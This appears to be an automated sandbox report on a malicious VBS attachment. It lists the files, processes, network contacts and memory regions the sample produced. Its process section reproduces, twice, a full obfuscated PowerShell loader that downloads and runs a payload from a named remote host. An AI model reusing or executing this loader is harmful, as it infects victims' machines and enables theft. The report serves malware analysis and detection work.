Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_egclhwgb.myd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_huoothud.2hk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rwyz3jwf.her.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sy40rhyy.vfi.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Ghastily.Kri
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs"
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping Horm5zl_6637.6637.6637.657e
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum
Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If
($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228
-lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function
Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land
';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo
reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse
'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr
s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig
Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe
ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR
egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer
iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj
B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora:
por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa
csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina
Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm
B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An
e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o
BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE
atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh
daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$clywDHarbePorknOphodescarP.onoAcutcRadihBe,nr Re,oForrnHje o
roslSi do SprgMopuiR gic Wina Prel bi lInstyunth]bane=crop$MindS,unnkItchuPlasbStrubBaizeDisc ');$Strygejernene=Tollhouse
'Supe$E amB KraoInj gMicagSle aUnasr Kilt.acu.UdebD nto ubiwIn.anEsc lBa vo.istasammdSpaeFGeigiArv l L.meKree( pla$ UstGHol
a olylU.lavLydbaNonpnCut.iOve,sFakumPre ,Hypa$UnviH PakjUn ge.iddmAm dlSankn ilgBebysbgerlKgebe.uitr Renn Prie Pro1Kopv1ov
r5Bass) int ';$Hjemlngslerne115=$Balsameringerne;Profitmagere (Tollhouse 'Elbe$TilbgForrL TekoAdonbAnimASy dLCram:Afs AB zanRa
dtAmbaaStatRKannCfle,hVe.diFiliSInittF ysiHorscSchaANosolOedi=Bala(StyrtHaaneunthSU coT hor-DistPtet,AK beTEksaHRdse xtr$Sebih
BorJUnd ENeohMMutil GnaN AfggAtl S La LYahoE HverNeogNco lEHooc1Inte1Sukk5gi b)Dise ');while (!$Antarchistical) {Profitmagere
(Tollhouse 'Game$Regeg .onlAfgioS,bhbThyraFortlL ot: nclPRipsrHi liSmrem ropuGeotsEmaneVintrDeut=Fejl$MindtTr erCrumuOkkuefrav
') ;Profitmagere $Strygejernene;Profitmagere (Tollhouse ' FlaSRheutDvnlAHarpRGlagt cli-Cal.S Aa lRigsES vee .auP Pr Subs4
Dam ');Profitmagere (Tollhouse 'gyps$Ku eGGastLSkamOstarb nsaS adl Ver:RammARektNSkalTSucuaApperTwatC omaHKoloi disSDesitSuffITranc
,ndAFredlgrun=R nk(AngiT.izzEtykkSFr mtNaiv- Endp O.eADuppTDok,H.dtr fr.m$Finsh Prej metEWo dm ladLUra nDupogJumbsBrnel ,leEPurvrUnfunTrekeMara1Colo1Cont5Succ)Fred
') ;Profitmagere (Tollhouse 'Ung,$Si,kGRubrL StaoCin B D.cA TefLCom.:E diF ifoHnger OkkN Gery ropeSt pR.omm=d ad$FollgTuneLGat.O
X lbPod.aMyrilInco: ratFGrowecommSStritBipls Tida AninOmregpasse ploNMesaE MarsUnen1S,ed9 For1Isoa+Turb+Lain%Teff$OverHFurcoKroprSkr,MF
ioO Injn Un eChem.inteCSerio EksUFejlNHysttPush ') ;$Galvanism=$Hormone[$Fornyer];}$Grooverhead=297577;$Quadricycler=30628;Profitmagere
(Tollhouse 'Gade$LangGDrosL PlaOTrolbOverABraiL ark:SkrmTR grR Kl iA oycB,edlNud,iVo tN piuI.uenuFlytM Ge inva=Inh. sejtg
FraEStriTSko,- AdeC winoBindNCrantS.avEcellN .rst hav Anad$rec,hSk kJ IndeLo,wMAkvalTo dNhom,GTongSDi oL JuvETho.rUncanMondESace1Dagt1Am.e5Gunv
');Profitmagere (Tollhouse 'Saks$OvilgSa ilHeatoRevobCamea AlflRe l:UdkrTS agr AngaDilig ,ruiHolok Cole epr ScyeCa.v Popu=
atc ava[PraeSMicryBor,steactfol.eS.anmDat . GenC Eleo rmmnApolvPle eLandrParat Kom]Jule: Bo :PlioF Ther DocoT,anm DukB Bija
La,sG nteE ta6 Hol4plafSbesnt Halr iliMetan,aflgU.ps( Cra$UdflTselvrBug,ijag,cfremlProfiKodinHeraiDe.iuFluemPedi)Mu a ');Profitmagere
(Tollhouse 'stru$BaleGMel.LAv lOSnedBRecrASla lC al:Ch ipvendEGys R ForV.efjAUn,esRoseI MarOC.unNHai Zoog= ot ka.a[.ppeSUntiygrinsIndeT,erveTe
tMPris.Pe lThal.E.yndX ,anTSfa . .areDobbNUnceCdolpO PreDelimI VernSymbg er]Mun : Sin:SognA nivsHalacSpeei VeliSkat.DoveGRetfeParatUndeSTilsT
ontR frsIShunNTa dGFlou(Thyr$Atebt TolrBogea Tipg B oi nhykCardEKrigrUretE Ma )I tr ');Profitmagere (Tollhouse 'Slge$ E,iG
AftlTek.OFroeB lesARa,ilBank:RewiNM.rieRomiWBanaFTranoEddeUUd mnBlacDTal l BraN uppDP.tuENagerTyraSPre =Svel$ DepPBeareedulrKlapV.ruma
UnmS HylITilhO SkanPro.. nrlSAnagu oncb Ps S S rtInfiRDes.IAgn.nMil.g Hyp(Shou$ SvrGR.soR D aOkreoOHengv Pere imer IsohI dhEOctoA
GrndMast,Back$Und.QShelUGa,tAPileDPyaeR MadiAntec SteyKongCC ckLChareDentR Ud ).lai ');Profitmagere $Newfoundlnders;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum
Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If
($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228
-lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function
Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land
';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo
reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse
'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr
s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig
Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe
ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR
egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer
iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj
B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora:
por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa
csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina
Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm
B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An
e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o
BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE
atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh
daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$clywDHarbePorknOphodescarP.onoAcutcRadihBe,nr Re,oForrnHje o
roslSi do SprgMopuiR gic Wina Prel bi lInstyunth]bane=crop$MindS,unnkItchuPlasbStrubBaizeDisc ');$Strygejernene=Tollhouse
'Supe$E amB KraoInj gMicagSle aUnasr Kilt.acu.UdebD nto ubiwIn.anEsc lBa vo.istasammdSpaeFGeigiArv l L.meKree( pla$ UstGHol
a olylU.lavLydbaNonpnCut.iOve,sFakumPre ,Hypa$UnviH PakjUn ge.iddmAm dlSankn ilgBebysbgerlKgebe.uitr Renn Prie Pro1Kopv1ov
r5Bass) int ';$Hjemlngslerne115=$Balsameringerne;Profitmagere (Tollhouse 'Elbe$TilbgForrL TekoAdonbAnimASy dLCram:Afs AB zanRa
dtAmbaaStatRKannCfle,hVe.diFiliSInittF ysiHorscSchaANosolOedi=Bala(StyrtHaaneunthSU coT hor-DistPtet,AK beTEksaHRdse xtr$Sebih
BorJUnd ENeohMMutil GnaN AfggAtl S La LYahoE HverNeogNco lEHooc1Inte1Sukk5gi b)Dise ');while (!$Antarchistical) {Profitmagere
(Tollhouse 'Game$Regeg .onlAfgioS,bhbThyraFortlL ot: nclPRipsrHi liSmrem ropuGeotsEmaneVintrDeut=Fejl$MindtTr erCrumuOkkuefrav
') ;Profitmagere $Strygejernene;Profitmagere (Tollhouse ' FlaSRheutDvnlAHarpRGlagt cli-Cal.S Aa lRigsES vee .auP Pr Subs4
Dam ');Profitmagere (Tollhouse 'gyps$Ku eGGastLSkamOstarb nsaS adl Ver:RammARektNSkalTSucuaApperTwatC omaHKoloi disSDesitSuffITranc
,ndAFredlgrun=R nk(AngiT.izzEtykkSFr mtNaiv- Endp O.eADuppTDok,H.dtr fr.m$Finsh Prej metEWo dm ladLUra nDupogJumbsBrnel ,leEPurvrUnfunTrekeMara1Colo1Cont5Succ)Fred
') ;Profitmagere (Tollhouse 'Ung,$Si,kGRubrL StaoCin B D.cA TefLCom.:E diF ifoHnger OkkN Gery ropeSt pR.omm=d ad$FollgTuneLGat.O
X lbPod.aMyrilInco: ratFGrowecommSStritBipls Tida AninOmregpasse ploNMesaE MarsUnen1S,ed9 For1Isoa+Turb+Lain%Teff$OverHFurcoKroprSkr,MF
ioO Injn Un eChem.inteCSerio EksUFejlNHysttPush ') ;$Galvanism=$Hormone[$Fornyer];}$Grooverhead=297577;$Quadricycler=30628;Profitmagere
(Tollhouse 'Gade$LangGDrosL PlaOTrolbOverABraiL ark:SkrmTR grR Kl iA oycB,edlNud,iVo tN piuI.uenuFlytM Ge inva=Inh. sejtg
FraEStriTSko,- AdeC winoBindNCrantS.avEcellN .rst hav Anad$rec,hSk kJ IndeLo,wMAkvalTo dNhom,GTongSDi oL JuvETho.rUncanMondESace1Dagt1Am.e5Gunv
');Profitmagere (Tollhouse 'Saks$OvilgSa ilHeatoRevobCamea AlflRe l:UdkrTS agr AngaDilig ,ruiHolok Cole epr ScyeCa.v Popu=
atc ava[PraeSMicryBor,steactfol.eS.anmDat . GenC Eleo rmmnApolvPle eLandrParat Kom]Jule: Bo :PlioF Ther DocoT,anm DukB Bija
La,sG nteE ta6 Hol4plafSbesnt Halr iliMetan,aflgU.ps( Cra$UdflTselvrBug,ijag,cfremlProfiKodinHeraiDe.iuFluemPedi)Mu a ');Profitmagere
(Tollhouse 'stru$BaleGMel.LAv lOSnedBRecrASla lC al:Ch ipvendEGys R ForV.efjAUn,esRoseI MarOC.unNHai Zoog= ot ka.a[.ppeSUntiygrinsIndeT,erveTe
tMPris.Pe lThal.E.yndX ,anTSfa . .areDobbNUnceCdolpO PreDelimI VernSymbg er]Mun : Sin:SognA nivsHalacSpeei VeliSkat.DoveGRetfeParatUndeSTilsT
ontR frsIShunNTa dGFlou(Thyr$Atebt TolrBogea Tipg B oi nhykCardEKrigrUretE Ma )I tr ');Profitmagere (Tollhouse 'Slge$ E,iG
AftlTek.OFroeB lesARa,ilBank:RewiNM.rieRomiWBanaFTranoEddeUUd mnBlacDTal l BraN uppDP.tuENagerTyraSPre =Svel$ DepPBeareedulrKlapV.ruma
UnmS HylITilhO SkanPro.. nrlSAnagu oncb Ps S S rtInfiRDes.IAgn.nMil.g Hyp(Shou$ SvrGR.soR D aOkreoOHengv Pere imer IsohI dhEOctoA
GrndMast,Back$Und.QShelUGa,tAPileDPyaeR MadiAntec SteyKongCC ckLChareDentR Ud ).lai ');Profitmagere $Newfoundlnders;"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://deseuri-romania.ro/Bennington.jpb
|
188.241.183.203
|
||
|
http://deseuri-romania.ro
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://aka.ms/pscore6lB_q
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://deseuri-romania.ro/Bennington.jpbXR0l
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://deseuri-romania.ro
|
unknown
|
||
|
https://deseuri-romania.ro/Bennington.jpbP
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 7 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
Horm5zl_6637.6637.6637.657e
|
unknown
|
|
|
|
s-part-0017.t-0009.fb-t-msedge.net
|
13.107.253.45
|
||
|
deseuri-romania.ro
|
188.241.183.203
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.241.183.203
|
deseuri-romania.ro
|
Romania
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
8380000
|
direct allocation
|
page execute and read and write
|
|
|
|
569C000
|
trusted library allocation
|
page read and write
|
|
|
|
2D2E0D12000
|
trusted library allocation
|
page read and write
|
|
|
|
97DB000
|
direct allocation
|
page execute and read and write
|
|
|
|
2D2D2A45000
|
trusted library allocation
|
page read and write
|
||
|
2D2CF23F000
|
heap
|
page read and write
|
||
|
72D0000
|
trusted library allocation
|
page read and write
|
||
|
4C7E000
|
trusted library allocation
|
page read and write
|
||
|
1F115FE000
|
stack
|
page read and write
|
||
|
7FFE7CEC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
201E07D5000
|
heap
|
page read and write
|
||
|
6E52000
|
heap
|
page read and write
|
||
|
6FE9000
|
heap
|
page read and write
|
||
|
969000
|
trusted library allocation
|
page read and write
|
||
|
6F73000
|
heap
|
page read and write
|
||
|
201E0C32000
|
heap
|
page read and write
|
||
|
2D2E9436000
|
heap
|
page read and write
|
||
|
2D2D2EA8000
|
trusted library allocation
|
page read and write
|
||
|
44A0000
|
heap
|
page execute and read and write
|
||
|
201DE890000
|
heap
|
page read and write
|
||
|
201E0693000
|
heap
|
page read and write
|
||
|
201E06A7000
|
heap
|
page read and write
|
||
|
71AD000
|
stack
|
page read and write
|
||
|
940000
|
trusted library allocation
|
page read and write
|
||
|
201E0817000
|
heap
|
page read and write
|
||
|
7CC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
263F30E0000
|
heap
|
page read and write
|
||
|
2D2E94AE000
|
heap
|
page read and write
|
||
|
201DE9BE000
|
heap
|
page read and write
|
||
|
71C0000
|
trusted library allocation
|
page read and write
|
||
|
201E083A000
|
heap
|
page read and write
|
||
|
201DE8EE000
|
heap
|
page read and write
|
||
|
201E0667000
|
heap
|
page read and write
|
||
|
4C23000
|
trusted library allocation
|
page read and write
|
||
|
201E0657000
|
heap
|
page read and write
|
||
|
201E07EE000
|
heap
|
page read and write
|
||
|
2D2D2DB2000
|
trusted library allocation
|
page read and write
|
||
|
8DDB000
|
direct allocation
|
page execute and read and write
|
||
|
8290000
|
trusted library allocation
|
page read and write
|
||
|
201E083A000
|
heap
|
page read and write
|
||
|
201E066F000
|
heap
|
page read and write
|
||
|
7FFE7CDB0000
|
trusted library allocation
|
page read and write
|
||
|
A58000
|
heap
|
page read and write
|
||
|
201E070F000
|
heap
|
page read and write
|
||
|
201E0817000
|
heap
|
page read and write
|
||
|
7E6D000
|
heap
|
page read and write
|
||
|
2D2D0BC0000
|
heap
|
page read and write
|
||
|
7E69000
|
heap
|
page read and write
|
||
|
2D2D0EC6000
|
trusted library allocation
|
page read and write
|
||
|
201E07D4000
|
heap
|
page read and write
|
||
|
2D2E9257000
|
heap
|
page read and write
|
||
|
7FFE7CFC0000
|
trusted library allocation
|
page read and write
|
||
|
201E0638000
|
heap
|
page read and write
|
||
|
201E06F7000
|
heap
|
page read and write
|
||
|
FFB138E000
|
stack
|
page read and write
|
||
|
C70000
|
heap
|
page read and write
|
||
|
2D2D20FE000
|
trusted library allocation
|
page read and write
|
||
|
201E0723000
|
heap
|
page read and write
|
||
|
7090000
|
trusted library allocation
|
page execute and read and write
|
||
|
4CD9000
|
trusted library allocation
|
page read and write
|
||
|
9422C7F000
|
stack
|
page read and write
|
||
|
201E0808000
|
heap
|
page read and write
|
||
|
70EE000
|
stack
|
page read and write
|
||
|
201E064C000
|
heap
|
page read and write
|
||
|
439E000
|
stack
|
page read and write
|
||
|
7FFE7CFE0000
|
trusted library allocation
|
page read and write
|
||
|
201DE9B6000
|
heap
|
page read and write
|
||
|
C12000
|
trusted library allocation
|
page read and write
|
||
|
FFB093E000
|
stack
|
page read and write
|
||
|
FFB04FE000
|
stack
|
page read and write
|
||
|
7FFE7CF85000
|
trusted library allocation
|
page read and write
|
||
|
2D2CF170000
|
heap
|
page read and write
|
||
|
2D2E928E000
|
heap
|
page read and write
|
||
|
4B3E000
|
trusted library allocation
|
page read and write
|
||
|
2D2CF23D000
|
heap
|
page read and write
|
||
|
2D2E9750000
|
heap
|
page read and write
|
||
|
201E0674000
|
heap
|
page read and write
|
||
|
770000
|
heap
|
page read and write
|
||
|
201E0648000
|
heap
|
page read and write
|
||
|
7FFE7D110000
|
trusted library allocation
|
page read and write
|
||
|
201E0638000
|
heap
|
page read and write
|
||
|
201DE9BE000
|
heap
|
page read and write
|
||
|
4410000
|
heap
|
page read and write
|
||
|
953000
|
trusted library allocation
|
page execute and read and write
|
||
|
201E07B1000
|
heap
|
page read and write
|
||
|
71D0000
|
trusted library allocation
|
page read and write
|
||
|
1F117FC000
|
stack
|
page read and write
|
||
|
2D2D164B000
|
trusted library allocation
|
page read and write
|
||
|
2D2D11C8000
|
trusted library allocation
|
page read and write
|
||
|
6F66000
|
heap
|
page read and write
|
||
|
692E000
|
stack
|
page read and write
|
||
|
263F31D5000
|
heap
|
page read and write
|
||
|
7FFE7CF70000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7D060000
|
trusted library allocation
|
page read and write
|
||
|
6FAE000
|
heap
|
page read and write
|
||
|
4418000
|
heap
|
page read and write
|
||
|
FFB148D000
|
stack
|
page read and write
|
||
|
2D2E945D000
|
heap
|
page read and write
|
||
|
201E0831000
|
heap
|
page read and write
|
||
|
2D2D0B30000
|
trusted library allocation
|
page read and write
|
||
|
2D2D11C4000
|
trusted library allocation
|
page read and write
|
||
|
7E00000
|
heap
|
page read and write
|
||
|
82B0000
|
trusted library allocation
|
page read and write
|
||
|
B5DB000
|
direct allocation
|
page execute and read and write
|
||
|
7CB7000
|
stack
|
page read and write
|
||
|
8370000
|
heap
|
page read and write
|
||
|
7CE0000
|
trusted library allocation
|
page read and write
|
||
|
201E07E2000
|
heap
|
page read and write
|
||
|
201E067D000
|
heap
|
page read and write
|
||
|
7FFE7CFA0000
|
trusted library allocation
|
page read and write
|
||
|
201E0654000
|
heap
|
page read and write
|
||
|
8020000
|
trusted library allocation
|
page read and write
|
||
|
201E0656000
|
heap
|
page read and write
|
||
|
7FFE7D0D0000
|
trusted library allocation
|
page read and write
|
||
|
201E0831000
|
heap
|
page read and write
|
||
|
2D2D2D8E000
|
trusted library allocation
|
page read and write
|
||
|
201DEB40000
|
heap
|
page read and write
|
||
|
201DEB48000
|
heap
|
page read and write
|
||
|
201E0830000
|
heap
|
page read and write
|
||
|
7FFE7D030000
|
trusted library allocation
|
page read and write
|
||
|
201DEB4D000
|
heap
|
page read and write
|
||
|
7FFE7D050000
|
trusted library allocation
|
page read and write
|
||
|
68AE000
|
stack
|
page read and write
|
||
|
201E083B000
|
heap
|
page read and write
|
||
|
201E06CE000
|
heap
|
page read and write
|
||
|
2D2CF1F5000
|
heap
|
page read and write
|
||
|
712F000
|
stack
|
page read and write
|
||
|
201E06B7000
|
heap
|
page read and write
|
||
|
201E07A5000
|
heap
|
page read and write
|
||
|
201E0817000
|
heap
|
page read and write
|
||
|
201E0808000
|
heap
|
page read and write
|
||
|
2D2D19F9000
|
trusted library allocation
|
page read and write
|
||
|
2D2D1A20000
|
trusted library allocation
|
page read and write
|
||
|
201E06FA000
|
heap
|
page read and write
|
||
|
201E0674000
|
heap
|
page read and write
|
||
|
7080000
|
trusted library allocation
|
page read and write
|
||
|
201DEB48000
|
heap
|
page read and write
|
||
|
201E0731000
|
heap
|
page read and write
|
||
|
8CA0000
|
direct allocation
|
page execute and read and write
|
||
|
201DEB4E000
|
heap
|
page read and write
|
||
|
7E57000
|
heap
|
page read and write
|
||
|
68EE000
|
stack
|
page read and write
|
||
|
7FFE7D0A0000
|
trusted library allocation
|
page read and write
|
||
|
980000
|
